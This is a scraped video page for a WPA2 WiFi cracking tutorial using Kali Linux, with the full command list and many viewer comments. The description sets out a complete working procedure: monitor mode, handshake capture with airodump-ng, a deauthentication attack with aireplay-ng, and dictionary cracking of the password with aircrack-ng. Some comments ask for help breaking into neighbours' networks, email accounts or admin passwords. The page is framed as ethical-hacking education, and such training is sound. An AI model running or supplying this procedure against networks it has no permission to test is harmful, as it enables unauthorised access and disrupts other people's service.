Cracking WiFi WPA2 Handshake

แชร์
ฝัง
  • เผยแพร่เมื่อ 28 พ.ค. 2024
  • Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video.
    Menu:
    Use airmon-ng to crack WiFi networks: 0:00
    Network Adapter to use: 0:46
    Kali Linux setup: 1:20
    Plug in network adapter: 1:35
    Verify that network adapter is recognized by Kali Linux: 2:04
    WPA2 network to crack: 2:43
    iwconfig: 3:27
    Kali Version: 3:34
    Kill conflicting processes with airmon-ng: 3:55
    Put interface into monitor mode: 4:32
    Discover WiFi Networks with airodump-ng: 5:15
    Use airodump-ng to view only one network: 6:20
    Connect to network using an iPhone: 6:39
    airodump-ng capture WPA2 four way handshake: 6:58
    Use aireplay-ng to deauthenticate clients: 7:25
    WPA2 four way handshake captured: 8:08
    Use Wireshark to view WPA2 four way handshake: 8:38
    Put interface back into managed mode: 9:30
    Crack WPA2 password with aircrack-ng: 10:10
    Password cracked: 11:00
    WiFi router WPA2 settings: 12:00
    Summary: 12:40
    ================
    Network Adapters:
    ================
    Alfa AWUS036NHA: amzn.to/3qbQGKN
    Alfa AWUSO36NH: amzn.to/3moeQiI
    ================
    Commands used:
    ================
    ! See version of Kali
    cat /etc/os-release
    uname -a
    ! See interfaces
    ip addr
    iwconfig
    !kill processes
    sudo airmon-ng check kill
    !Start monitor mode
    sudo airmon-ng start wlan0
    !Verify that monitor mode is used
    sudo airmon-ng
    !You could also use iwconfig to check that interface is in monitor mode:
    iwconfig
    ! Get the AP's MAC address and channel
    sudo airodump-ng wlan0mon
    ! AP-MAC & channel - you need to select your own here:
    ESSID: 90:9A:4A:B8:F3:FB
    Channel used by AP for SSID: 2
    !1st Window:
    !Make sure you replace the channel number and bssid with your own
    !Replace hack1 with your file name like capture1 or something
    sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon
    !2nd Window - deauth attack
    !Make sure you replace the bssid with your own
    sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon
    !Use Wireshark to open hack file
    wireshark hack1-01.cap
    !Filter Wireshark messages for EAPOL
    eapol
    !Stop monitor mode
    airmon-ng stop wlan0mon
    !Crack file with Rock you or another wordlist
    !Make sure you have rockyou in text format (unzip file on Kali)
    !Replace hack1-01.cap with your file name
    aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
    ================
    Previous videos:
    ================
    Kali Installation: • Kali Linux 2020.3 inst...
    WPA2 GPU password cracking: • Brute force WiFi WPA2
    Wordlists (rockyou): • rockyou
    ================
    Connect with me:
    ================
    Discord: / discord
    Twitter: / davidbombal
    Instagram: / davidbombal
    LinkedIn: / davidbombal
    Facebook: / davidbombal.co
    TikTok: / davidbombal
    TH-cam: / davidbombal
    ================
    Support me:
    ================
    Buy my CCNA course and support me:
    DavidBombal.com: CCNA ($10): bit.ly/yt999ccna
    Udemy CCNA Course: bit.ly/ccnafor10dollars
    GNS3 CCNA Course: CCNA ($10): bit.ly/gns3ccna10
    ======================
    Special Offers:
    ======================
    Boson software: 15% discount
    Link: bit.ly/boson15
    Code: DBAF15P
    wifi
    kali linux
    kali linux 2020
    kali linux 2020.4
    wifite
    wpa
    wep
    wps
    alfa
    comptia
    ceh
    oscp
    wifi
    airmon-ng
    aircrack-ng
    hack
    hacker
    hacking
    ethical hacking
    kali
    ine
    Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
    #wifi #wpa2 #kalilinux
  • วิทยาศาสตร์และเทคโนโลยี

ความคิดเห็น • 1.5K

  • @davidbombal
    @davidbombal  3 ปีที่แล้ว +218

    Menu:
    Use airmon-ng to crack WiFi networks: 0:00
    Network Adapter to use: 0:46
    Kali Linux setup: 1:20
    Plug in network adapter: 1:35
    Verify that network adapter is recognized by Kali Linux: 2:04
    WPA2 network to crack: 2:43
    iwconfig: 3:27
    Kali Version: 3:34
    Kill conflicting processes with airmon-ng: 3:55
    Put interface into monitor mode: 4:32
    Discover WiFi Networks with airodump-ng: 5:15
    Use airodump-ng to view only one network: 6:20
    Connect to network using an iPhone: 6:39
    airodump-ng capture WPA2 four way handshake: 6:58
    Use aireplay-ng to deauthenticate clients: 7:25
    WPA2 four way handshake captured: 8:08
    Use Wireshark to view WPA2 four way handshake: 8:38
    Put interface back into managed mode: 9:30
    Crack WPA2 password with aircrack-ng: 10:10
    Password cracked: 11:00
    WiFi router WPA2 settings: 12:00
    Summary: 12:40
    ================
    Network Adapters:
    ================
    Alfa AWUS036NHA: amzn.to/3qbQGKN
    Alfa AWUSO36NH: amzn.to/3moeQiI
    ================
    Commands used:
    ================
    ! See version of Kali
    cat /etc/os-release
    uname -a
    ! See interfaces
    ip addr
    iwconfig
    !kill processes
    sudo airmon-ng check kill
    !Start monitor mode
    sudo airmon-ng start wlan0
    !Verify that monitor mode is used
    sudo airmon-ng
    !You could also use iwconfig to check that interface is in monitor mode:
    iwconfig
    ! Get the AP's MAC address and channel
    sudo airodump-ng wlan0mon
    ! AP-MAC & channel - you need to select your own here:
    ESSID: 90:9A:4A:B8:F3:FB
    Channel used by AP for SSID: 2
    !1st Window:
    !Make sure you replace the channel number and bssid with your own
    !Replace hack1 with your file name like capture1 or something
    sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon
    !2nd Window - deauth attack
    !Make sure you replace the bssid with your own
    sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon
    !Use Wireshark to open hack file
    wireshark hack1-01.cap
    !Filter Wireshark messages for EAPOL
    eapol
    !Stop monitor mode
    airmon-ng stop wlan0mon
    !Crack file with Rock you or another wordlist
    !Make sure you have rockyou in text format (unzip file on Kali)
    !Replace hack1-01.cap with your file name
    aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
    ================
    Previous videos:
    ================
    Kali Installation: th-cam.com/video/VAMP8DqSDjg/w-d-xo.html
    WPA2 GPU password cracking: th-cam.com/video/J8A8rKFZW-M/w-d-xo.html
    Wordlists (rockyou): th-cam.com/video/rgWcguAg-XA/w-d-xo.html
    ================
    Connect with me:
    ================
    Discord: discord.com/invite/usKSyzb
    Twitter: twitter.com/davidbombal
    Instagram: instagram.com/davidbombal
    LinkedIn: www.linkedin.com/in/davidbombal
    Facebook: facebook.com/davidbombal.co
    TikTok: tiktok.com/@davidbombal
    TH-cam: th-cam.com/users/davidbombal
    ================
    Support me:
    ================
    Buy my CCNA course and support me:
    DavidBombal.com: CCNA ($10): bit.ly/yt999ccna
    Udemy CCNA Course: bit.ly/ccnafor10dollars
    GNS3 CCNA Course: CCNA ($10): bit.ly/gns3ccna10
    ======================
    Special Offers:
    ======================
    Boson software: 15% discount
    Link: bit.ly/boson15
    Code: DBAF15P
    Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

    • @AjaySharma-007
      @AjaySharma-007 3 ปีที่แล้ว +3

      You way to explain is very good ,please keep it up... Please make some video on windows admin password bypass or hacking or email account hacking ..Thanks

    • @wilfredocal8557
      @wilfredocal8557 3 ปีที่แล้ว +6

      please hack my neighbors wifi

    • @mobiousenigma
      @mobiousenigma 3 ปีที่แล้ว +3

      your teaching thieves or want to be thieves! the man pages for aircrack-ng and others in the suite is more than enough information or tutorial for any ethical use! fortunately the reality of wpa2 with 1x8^120 to 1x64^120 possibilities and roughly a 3000 keys per second with descent hardware a 100 to 10000 year run is unpractical. collecting ssid and handshakes and mac addresses is easy dose not even require linux or monitor mode but brute forcing any strong password over 14 chars long is not going to happen , you should examine your ethics sir because your audience isnt going to set up a pertest lab or ask permission of a network owner no matter how many times you ask them not to! anyone with any true interest in pen testing will have enough system and network admin knowledge to be functional with a man page nor would they require the detailed explanations you give on basic principals. hopefully no one you care about becomes a victim of someone you taught

    • @itsme7570
      @itsme7570 3 ปีที่แล้ว +1

      Hey, I've followed this tutorial and for some reason my deauth attack isn't working. I've even tried mdk4 and it's just not kicking me from the network and not capturing the handshake. I've looked all over the internet for a solution but have yet to find one. So now I ask you! David Bombal community, if you are here then you are most likely highly intelligent. How about sharing some knowledge with your boy

    • @mobiousenigma
      @mobiousenigma 3 ปีที่แล้ว

      @@itsme7570 you followed the tutorial and its not working....... do you understand what you are doing? its a signal strength issue...you have one radio connected to another and a third is trying to say louder no not that radio this one.....but it isnt louder than the first radio so you get squat....now why are you trying to learn how to steal?

  • @aty4282
    @aty4282 3 ปีที่แล้ว +254

    David: only attack networks that *you own*
    Me: well, i basically "own" the network after im in- *gets sent to gulag*

  • @69rogefer
    @69rogefer ปีที่แล้ว +16

    Hey! Mr. David Bombal, thanks a million. I am from Tijuana, Mexico, I am 53, and I just get this "KALI LINUX" os, with knowing nothing what so ever about this LINUX SYSTEM. So, as you can imagine, I've whatched so many video tutorials, and well, I'm a little confused with all this commands, and passwords, but I'm doing a little progres in understanding the basics. And let me tell you, that until I watched your video here, I finally get to run the tools in the AIRCRACK-NG SUITE. The way you exp;ain step by step, it"s so clear, THAT EVEN ME GET TO UNDERSTAND WHAT TO DO, AND WHAT EXACTLY IS THE PROGRAM DOING WITH EACH ONE OF THE COMMANDS. THANK YOU SIR. I hope that my written engish is not so bad, and you get may gratitude.

  • @KacangNgoding
    @KacangNgoding 2 ปีที่แล้ว +20

    Ah, finally, I found a proper way to learn about network security.

  • @ak11230
    @ak11230 2 ปีที่แล้ว +2

    I am computer consultant 1991 Melbourne Fl . Degree in electric engineering major computer input -output
    I did make living recovering , braking password , Old days 500 dollars maybe 1 hours ?
    Upset employees password all network and quit many times . . I really thanks You David deep from my heart for educating young people ... We needed that in America ...

  • @paulmacgiollacaoine8619
    @paulmacgiollacaoine8619 3 ปีที่แล้ว +52

    Such a great format, you make it seem so simple ❤️👍

  • @78inn
    @78inn 3 ปีที่แล้ว +4

    You are my favorite. You talk so clearly and demonstrate in clean way.

  • @user-xd4sb5rq4o
    @user-xd4sb5rq4o 3 ปีที่แล้ว +40

    After watching first video in your channel, It took only 2 minutes to decide weather i want to subscribe your channel or not. Love this. Such an awesome presentation. ♥

    • @XYElement72
      @XYElement72 ปีที่แล้ว

      Does WiFi hacking damage the phone's battery?
      Is there a virus that can damage the battery through Wi-Fi?

  • @deckieb1
    @deckieb1 3 ปีที่แล้ว +20

    I am 56 and you make this all so interesting and easy. I love what you do and cant thank you enough for educating me.

  • @nonegone7170
    @nonegone7170 3 ปีที่แล้ว +36

    Brilliantly made video as we've all come to expect from you, David.
    Really invigorates the motivation to keep at it.
    Keep it up!

    • @davidbombal
      @davidbombal  3 ปีที่แล้ว +8

      Thank you!

    • @Manishkumar-dj6kl
      @Manishkumar-dj6kl 2 ปีที่แล้ว +2

      @@davidbombal sir plz make video on how to create backdoor through wifi🙏

    • @TheOneAndOnlyNomad
      @TheOneAndOnlyNomad 4 หลายเดือนก่อน

      @@Manishkumar-dj6kl that's sound mighty like malicious intent

  • @thats-not-my-name2078
    @thats-not-my-name2078 3 ปีที่แล้ว +42

    Such a clear and well communicated lesson definitely will be watching more of your videos and looking at your courses, thank you for this great lesson David!

    • @davidbombal
      @davidbombal  3 ปีที่แล้ว +2

      Thank you Bryce!

    • @MoviesForFun-zm6jv
      @MoviesForFun-zm6jv 4 หลายเดือนก่อน +1

      hi please make a full video about evil twin attack
      @@davidbombal

  • @arnaldogonzalez1
    @arnaldogonzalez1 2 ปีที่แล้ว

    backtrack was my introduction to Linux / cybersecurity back in 2008. So glad that I kept digging at it, best decision ever

  • @eliasmierau5421
    @eliasmierau5421 2 ปีที่แล้ว

    I just saw this video and right away had to subscribe, absolute wonderful!! you make it look so simple, thank you so very much!

  • @Steve_be
    @Steve_be 3 ปีที่แล้ว +11

    This for me is the best presented shows on YT its given me so much pleasure and being retired keeps me busy lerning thank you sir.

  • @ryanlea750
    @ryanlea750 2 ปีที่แล้ว

    A great video we went over this in class I had notes to the best of the circumstances lectures happen fast. This helped me fill in the holes. Great video. Thank you!

  • @niklasd6149
    @niklasd6149 3 หลายเดือนก่อน

    Thank you, very straight forward. I like that. You talk about the vital things without nonsens. That is a real pro.

  • @nicolasnoka
    @nicolasnoka 2 ปีที่แล้ว +3

    Just if somebody is having issues with VM, I was not able to find any SSIDs until I changed my VM network configuration. I changed to Bridge and it worked. I am still new on this and I will keep doing research. Thanks David for all the good work here!

    • @steveortiz1026
      @steveortiz1026 หลายเดือนก่อน

      hey your comment is 2 years old i did what you said but i still don't see any ssids should i set the Promiscuous Mode to Allow VMs vs Allow All? please help

  • @dr.-a
    @dr.-a 2 ปีที่แล้ว +54

    I Love your setup and the blue back light, your way of explaining things is very easy to understand, you should consider teaching a CEH course online or in Udemy
    Thank You Sir Mad Respect 🙏🏼

    • @stevenjacobs4329
      @stevenjacobs4329 2 ปีที่แล้ว +1

      He teaches on Udemy too, amazing teacher. courses are free on youtube but for people that can afford they can support him on Udemy

    • @Billofx...
      @Billofx... ปีที่แล้ว

      u b naija boss man

  • @gtheentreprenerd7207
    @gtheentreprenerd7207 11 หลายเดือนก่อน

    David I really like your channel, the more and more I watch your video.
    I Lovve how descriptive you are explaining things

  • @jasondevaladares8391
    @jasondevaladares8391 5 หลายเดือนก่อน +1

    AMAZINGLY well put together, researched and shown. This helped me with a CTF I was doing.

  • @sandalysandaly6000
    @sandalysandaly6000 3 ปีที่แล้ว +8

    I must say that you are indeed an excellent teacher.
    You did not explain what to do after I have the HANDSHAKE
    I'll be glad to hear from you.
    Thank you very much.

    • @RO-rw4hs
      @RO-rw4hs 6 หลายเดือนก่อน

      He said you can crack it

    • @shawnmendrek3544
      @shawnmendrek3544 หลายเดือนก่อน

      Just look it up.

  • @deepakchalise9653
    @deepakchalise9653 2 ปีที่แล้ว +69

    Do u really think all the people are here for education purpose 😂🗿

    • @slicybtw
      @slicybtw หลายเดือนก่อน +6

      Nah hes using it as a excuse.

    • @sino6834
      @sino6834 หลายเดือนก่อน +7

      Yep it's just for educational purposes😊

    • @yamuna6838
      @yamuna6838 หลายเดือนก่อน +1

      😊😏😎

    • @Opinion_Box82
      @Opinion_Box82 หลายเดือนก่อน

      😂😂😂

    • @moogiibat5845
      @moogiibat5845 หลายเดือนก่อน +3

      I am

  • @elsoyboy3977
    @elsoyboy3977 ปีที่แล้ว

    Excelente video, thank you so much, I saw many blogs and they didn't explain as good as you.
    I thought I wouldn't find videos like this in TH-cam jajaja.

  • @elScrimbloBimblo
    @elScrimbloBimblo ปีที่แล้ว +1

    this helped me find so many flaws in my network setup. THANK YOU for this educational video, this kind of attack is very common in my area and I can now make it difficult for CTRL+V script kids to scan/connect my network.

  • @garcand
    @garcand 3 ปีที่แล้ว +14

    David, you have been killing it with hacking videos! Thank you Sir, you're a great teacher !

    • @davidbombal
      @davidbombal  3 ปีที่แล้ว +2

      Thank you Andrew!

    • @peterbefreebrothasandsista2465
      @peterbefreebrothasandsista2465 3 ปีที่แล้ว

      I get get locked up for it yet he gets a fucking superstardom even gets paid for it the fucking irony.

    • @notahacker2107
      @notahacker2107 3 ปีที่แล้ว +1

      @@peterbefreebrothasandsista2465 because he’s not using it as a black hat hacker that’s why.

    • @peterbefreebrothasandsista2465
      @peterbefreebrothasandsista2465 3 ปีที่แล้ว +1

      Deven I think you miss the point for those that will use it for malicious intentions like noobs and the likes of he has give a demonstration of the very thing and precise education on how to he might as well have done now giving as incompetent it be presenting yourself to be a cyber security specialist it’s a bit of irony don’t you think of teaching people how to crack a WiFi network what’s it for other cyber security analysts that would already have taught that it college or perhaps anywhere else that give a recognised certificate in giving you implement security against such things what’s is it for a reminder on how to do it right or perhaps a procedure just in case you checking for vulnerability’s or the strength of the key the point is Deven that he is showing the world as in how to crack a network illegally on a public platform which I think you missed wither he is using it for black hat or not or he considers himself white he has give a class on how break into a WiFi network why not teach as it’s presented how to stop such attacks as in a class on ips or ids with maybe how to compile a firewall like P-fense highlighted comment well if someone breaks into my network i will tell the government it’s cyber analyst taught them how and hold them to account the fucking irony he’s not using it for black-hat he might as well.

    • @nabildahmani8286
      @nabildahmani8286 2 ปีที่แล้ว

      @@davidbombal what's the attack name and the protocol used ??????

  • @georgeschmitz4422
    @georgeschmitz4422 3 ปีที่แล้ว +4

    Hi David,
    Easy to follow your steps. But how to go about if the AP (WPA2 CCMP PSK) does not bring out a EAPoL?
    Do I just have to try to go with Hashcat instead? This would eliminate Wireshark as well?
    Thank You Georg

  • @PiyushAggarwal0
    @PiyushAggarwal0 2 ปีที่แล้ว

    thank you David! I just subbed, great videos! Much love from pentesting enthusiasts in India :D

  • @slashingbison2503
    @slashingbison2503 ปีที่แล้ว +1

    Great training video learnt a lot, had a few issues along the way that were resolved and my understanding is much better, hope i can start to remember some commands there is so much syntax is Linux.

  • @joelsquispe5645
    @joelsquispe5645 3 ปีที่แล้ว +5

    Very well explained. I'm starting in cybersecurity thanks to you! :)

    • @davidbombal
      @davidbombal  3 ปีที่แล้ว +2

      Thank you Joel. That's fantastic!

    • @TravelToday1
      @TravelToday1 3 ปีที่แล้ว +1

      hey thank u but there is a problem when I type sudo airman-ng its still on wlan0 not wlan0mon why???

  • @ABDR._.
    @ABDR._. 3 ปีที่แล้ว +4

    Nice video Mr.David You are The Best Keep Going 👏👏👏👏👏

    • @davidbombal
      @davidbombal  3 ปีที่แล้ว +1

      Thank you. I really appreciate that :)

  • @user-xd4sb5rq4o
    @user-xd4sb5rq4o 3 ปีที่แล้ว

    You have good contents as always... Always you are complete with the topic which you are streaming

  • @MichaelBeamTheMan
    @MichaelBeamTheMan 5 หลายเดือนก่อน

    Great video. I'm 55 years old and just starting my path. I have always loved technology. My parents would drop me at radio shack and I would play on the old tandy's for hours. I learned alot from this video and it helped me to make more sense of things. Thanks for sharing.

  • @CyberAbyss007
    @CyberAbyss007 3 ปีที่แล้ว +9

    Thanks for the great content! I've done some of this in Virtual Box. I did notice that VMs can be picky about the brand or version of wi-fi devices. Some better than others. Looking forward to duplicating this video in my lab environment. :-)

    • @mobiousenigma
      @mobiousenigma 3 ปีที่แล้ว

      its the adapters chipset some do not support instructions given in airx-ng ,,and vms in general have issues with internal hardware and ownership so usb adapters sidestep that issue

    • @harvindersingh4411
      @harvindersingh4411 2 ปีที่แล้ว

      @@mobiousenigmaI am using kali in a virtual box but it won't show me the wireless network as it reads that network as an internal network and shows it as a wired network (eth0) instead. How to fix it?

    • @mobiousenigma
      @mobiousenigma 2 ปีที่แล้ว

      @@harvindersingh4411 its not broken thats how virtual machines work. if you want wireless in a virtual desktop it needs to be usb.

    • @harvindersingh4411
      @harvindersingh4411 2 ปีที่แล้ว +1

      @@mobiousenigma So that means I can't use the internal adapter as a wireless network in virtual box?

    • @mobiousenigma
      @mobiousenigma 2 ปีที่แล้ว

      @@harvindersingh4411 dual boot

  • @Anatol_SG
    @Anatol_SG 3 ปีที่แล้ว +41

    2:50 "Here I have a TP-link router, which I've purchased" Yes, Mr Bombal, we believe you!
    That's my way of hacking WiFis by stealing the whole network adapter 😂

    • @davidbombal
      @davidbombal  3 ปีที่แล้ว +16

      lol... great comment. Yes, easier to just take the whole device. Got to demonstrate that I'm using my own devices so I don't get into trouble.

    • @grandmakisses9973
      @grandmakisses9973 3 ปีที่แล้ว +1

      LOL

    • @sarthaksharma6029
      @sarthaksharma6029 3 ปีที่แล้ว

      @@davidbombal I am a beginner but I want to study Ethical hacking please anyone help me what to learn and from where????

    • @mariab0209
      @mariab0209 3 ปีที่แล้ว

      For the routers o módems Tp link and Belkin is easy to hack ? Mr Bombal ? In Windows is posible ? Or only in kali Linux ?

    • @grandmakisses9973
      @grandmakisses9973 3 ปีที่แล้ว

      @@mariab0209 esc que je alle a toulitet

  • @sunderskoranga
    @sunderskoranga 4 หลายเดือนก่อน +1

    My lenovo laptop has intel wireless adapter with monitor capablity. Installed kali linux on usb drive and cracked the password. Great tutorial. Thanks.

  • @misterz5908
    @misterz5908 2 ปีที่แล้ว +2

    I know many people have told you What I am about to tell you.
    You are the best!👍😎

  • @silviacarlosamachasoy8189
    @silviacarlosamachasoy8189 3 ปีที่แล้ว +6

    Hola.
    Te quería agradecer por tu gran conocimiento aportado, me ha sido de mucha utilidad para manejar este sistema.
    Cuidate y gracias ☺️👍

  • @juancamilomedinagarzon1375
    @juancamilomedinagarzon1375 2 ปีที่แล้ว +6

    Mil gracias amigo los subtitulos traducidos funcionan perfectamente y se te entiende muy bien.

  • @samantasunanda
    @samantasunanda 2 ปีที่แล้ว +1

    I think I just found a gem YT channel, thanks David for being an amazing guide.

    • @davidbombal
      @davidbombal  2 ปีที่แล้ว

      Glad you enjoyed the video!

  • @campursarimania
    @campursarimania 6 หลายเดือนก่อน

    just happen to have a TPLink WN722 layin around and doing test on my own network. tutorial works great. thank you

  • @asdfssdfghgdfy5940
    @asdfssdfghgdfy5940 ปีที่แล้ว +7

    Something I'd recommend if you are using kali in a live environment (i.e. it isn't your main system you are doing anything on) is to sudo su so you don't have to type sudo before every command. Especially useful when you are learning.

    • @user-vk2cd9qw7i
      @user-vk2cd9qw7i 10 หลายเดือนก่อน +1

      yeah make sure it's not your main system LOL I don't want to think about how much data has been lost to people not realizing they're superuser and rm rf ing their whole file system

    • @asdfssdfghgdfy5940
      @asdfssdfghgdfy5940 10 หลายเดือนก่อน

      @@user-vk2cd9qw7i or in the case of Gitlab using it on the wrong system

  • @ABDR._.
    @ABDR._. 3 ปีที่แล้ว +6

    Good Content Mr.David 👏👏👏👏👏👏

  • @claudekellygbeu4705
    @claudekellygbeu4705 ปีที่แล้ว

    this is by far the best tutorial and demonstration of airmon/aircrack.

  • @itzuleanu
    @itzuleanu 4 หลายเดือนก่อน +2

    I followed a lot of tutorials but none worked but this worked for me thanks men i appreciate it ❤❤

  • @prospect8245
    @prospect8245 ปีที่แล้ว +10

    That wordlist only really works if you live in a country where english is the main language though it seems

  • @facttrendz1314
    @facttrendz1314 3 ปีที่แล้ว +30

    while(True):
    print("David sir is great")

  • @deanbp4
    @deanbp4 3 ปีที่แล้ว +1

    What camera and lighting do you use for your video presentations? It all looks very good.

  • @user-mo9wc8sy3t
    @user-mo9wc8sy3t 10 หลายเดือนก่อน

    Ευχαριστώ για αυτό το υπέροχο μάθημα David!

  • @cthoadmin7458
    @cthoadmin7458 3 ปีที่แล้ว +4

    Hi David, you seem to be a cut above the other TH-cam presenters in this subject. I suspected you might be a professional presenter, and it looks like you are... QUESTION: do you have a course or series of courses that would get me to a stage where I could sit for the Cisco CCNA exams with a reasonable expectation of passing them? Then maybe the CCNA Security specialties? Money no object my company will pay...

  • @mrrobot4840
    @mrrobot4840 3 ปีที่แล้ว +7

    i tested this thing when i was in school on my second router information wasn't available like that at that time it was my passion to learn new stuff but now life has changed so much I don't even have the time to play games or watch tv

  • @MaZeR98765
    @MaZeR98765 2 ปีที่แล้ว

    Did this in college! Very good demo :)

  • @MrRahul123919
    @MrRahul123919 2 ปีที่แล้ว

    Hello sir. I hv seen lots n lots video different kind of tutorials. But the ur way of explanation. It really outstanding. It's very feel us easy even hard concept

  • @johnskrabut7235
    @johnskrabut7235 2 ปีที่แล้ว +14

    Just a heads up, the router ESSID names you have redacted are visible for a brief period of time between timestamp 6:49 and 6:50. Also, thank you for the video! Very informative and simplified.

    • @khalidnoor2556
      @khalidnoor2556 2 ปีที่แล้ว +3

      idk why but after doing airodump-ng i dont discover any wifi

    • @Alex-ln9on
      @Alex-ln9on ปีที่แล้ว

      Hey, try airmon-ng check kill

    • @Alex-ln9on
      @Alex-ln9on ปีที่แล้ว

      Make sure your network adapter supports monitor mode and packet injection.

    • @SilverWolf-rz4bq
      @SilverWolf-rz4bq 11 หลายเดือนก่อน +1

      ​@@khalidnoor2556btw did you figure it out? cos even I'm facing the same issue here

    • @sankalpnaik877
      @sankalpnaik877 10 หลายเดือนก่อน

      ​@@SilverWolf-rz4bqdid u figure out

  • @marco201ful
    @marco201ful 3 ปีที่แล้ว +4

    Keep it coming!!!! But please update your Udemy course with these Videos 😁

  • @ramgopalkrishnapandu
    @ramgopalkrishnapandu 3 ปีที่แล้ว

    Clear and crisp... Thanks for the video... you nailed it.. :-)

  • @trojankit
    @trojankit ปีที่แล้ว +2

    Hi David, please on your vmware configuration, did you use NAT or Bridged network to work with the adapter...thanks... I'll appreciate a response

  • @theodorecandela3415
    @theodorecandela3415 2 ปีที่แล้ว +5

    When I put my card in monitor mode and remove it from monitor mode with the airmon-ng commands , iw dev still shows it in monitor mode.
    Also airmon-ng doesn't rename it to wlan0mon, it stays at wlan0, but monitor mode works.

    • @krakowiaczek1939
      @krakowiaczek1939 2 ปีที่แล้ว

      did you find the solution to the problem? i have tl-wn725n, and i can't start wlan0mon :(

  • @ImParzelli
    @ImParzelli 3 ปีที่แล้ว +148

    Do you have classes? I'm grown but if my parents ever asked me who i wanted to be like when i grew up, i would say: David Bombal LOL

    • @mosqali1970
      @mosqali1970 3 ปีที่แล้ว +1

      Hahahaha nice

    • @arko1830
      @arko1830 3 ปีที่แล้ว +1

      Yes he does

    • @jamesdickson3631
      @jamesdickson3631 3 ปีที่แล้ว +1

      I will say the same. He is my role model

    • @terrorkaze486
      @terrorkaze486 3 ปีที่แล้ว +11

      Network Chuck

    • @jamesdickson3631
      @jamesdickson3631 3 ปีที่แล้ว +2

      @@RandomVideosN.S.WAustralia yes he n Zaid Sabith ( Ireland) are great too.

  • @loczster
    @loczster ปีที่แล้ว

    Hey David great video, overall great channel. I have a question about the VM network.
    My computer has a built-in Wi-Fi that does not have monitoring and injection capability so I pick up a Wi-Fi adapter, a Linksys wusb6300. Do I have to disable the onboard Wi-Fi and only work out of the Linksys in order for this to work? Thanks

  • @shaydusty6087
    @shaydusty6087 3 ปีที่แล้ว +1

    Very informative and well explained - thankyou David

  • @tonymontana8622
    @tonymontana8622 2 ปีที่แล้ว +2

    Hi,
    If you capture more than 1 handshake, let's say you capture 9 handshakes, how can you reduce the number of handshakes in the cap file to make the cracking less redundant?

    • @jeramiahclark9826
      @jeramiahclark9826 ปีที่แล้ว

      did you resolve this? i tried two cap files first one said denied access, cap2 file works

    • @natkhatlonda
      @natkhatlonda 7 หลายเดือนก่อน

      ​@@jeramiahclark9826hey why isn't airodump-ng showing any bssid?
      How can I solve this problem?

  • @potato_joe101
    @potato_joe101 2 ปีที่แล้ว +3

    Great! Now I can mess with- uh I mean “demonstrate” my new skills to my friends!

  • @havishgahlot6542
    @havishgahlot6542 3 ปีที่แล้ว

    Thanks sir for the information you explain each and every command which makes it easier to understand......
    Love from India!

  • @birukaregu2798
    @birukaregu2798 2 ปีที่แล้ว +1

    Great tutorial, helped me a lot and thank you!

  • @suriyasundaram5987
    @suriyasundaram5987 3 ปีที่แล้ว +4

    hey david... although i did all the steps correctly after the deauthentication i dont get a wpa handshake
    .. pls help me through this

    • @happygujjar7254
      @happygujjar7254 3 ปีที่แล้ว

      Same here bro didn't get the wpa handshake

    • @msubhietamam5720
      @msubhietamam5720 2 ปีที่แล้ว

      You will not getting the handshake if there was no known device try to connect to the network. You need to wait until a known device connecting to the target wifi. It consumes time.

    • @happygujjar7254
      @happygujjar7254 2 ปีที่แล้ว

      @@msubhietamam5720 ok got your point.
      You make me to dive into again.

    • @msubhietamam5720
      @msubhietamam5720 2 ปีที่แล้ว

      @@happygujjar7254 happy cracking then! 😊

  • @gojo1825
    @gojo1825 26 วันที่ผ่านมา +3

    Nothing is working for me 😞

  • @ayze3718
    @ayze3718 2 ปีที่แล้ว +1

    Well explained David you did a great job
    😎👍

  • @hamzausman7801
    @hamzausman7801 2 ปีที่แล้ว +1

    After a long time I found a suitable video. Thanks man. And I also wanna request that will you please upload videos on teaching c++, http and other programming languages.

  • @ujithadharshana7397
    @ujithadharshana7397 3 ปีที่แล้ว +3

    lets crack it sir , Love Kali

  • @An.Individual
    @An.Individual 3 ปีที่แล้ว +8

    Good video but I think this is still brute forcing and will not work against a good password.
    I think the most effective attack on WPA2 is Fluxion and I wish David would demonstrate Fluxion so people will recognise it and not fall for it (like I did)

    • @acidhauss7018
      @acidhauss7018 ปีที่แล้ว

      Agree all wifi passwords are nonstandard out of the box e.g. e7xjedhjd

  • @sidmovich
    @sidmovich ปีที่แล้ว

    Thank you for the lesson, finaly learned how to use aireplay and etc, doing all this lesson steps via a rapsberrypi 3b+ , in the end it takes about 8 hours or more to crack the password, if aircrack can do it, probably better to store the .cap file in a usb drive and crack it using my main pc to see the results (do this on your own network, deauth will make the network unusable while running, so probably your neighbor that makes a lot of noise will notice it)

  • @wsurferdude_ct
    @wsurferdude_ct ปีที่แล้ว

    Valuable info! I can test my password conventions against a commonly used wordlist which is most apt to be used against me. Thanks!

  • @rxop184
    @rxop184 2 ปีที่แล้ว

    it requires a huge practical knowledge and consistent practice to be like u :)

  • @encryptedninja
    @encryptedninja 2 ปีที่แล้ว

    David, which network adapter would work with Kali in 2021? (2.5/5 ghz) Great video!

  • @leosaravia01
    @leosaravia01 2 ปีที่แล้ว +1

    Very nice info, there's still no better way to crack WPA2.... only if the WPS is active. Which version kali are you using? And that terminal looks so clean! very nice set up!

  • @MdJahidulIslam-cj3tm
    @MdJahidulIslam-cj3tm 11 หลายเดือนก่อน

    You are awesome ❤❤. I have watched many of your videos❤❤

  • @hansvanderlinden6545
    @hansvanderlinden6545 3 ปีที่แล้ว +1

    Thanks David. Learned a lot. Appreciate your tranquility when you're talking. It makes it easy to follow. I want to use the learnings for hardening my own security. In this respect my two questions are the following. I use mac address authentication for my wireless LAN (as opposed to wifi internet access for guests) and the SSID for it is not being broadcasted. Makes these two measures my LAN more difficult to hack. Thanks for your answer in advance.

  • @jeffyramalhocardioworkouts
    @jeffyramalhocardioworkouts 2 ปีที่แล้ว +1

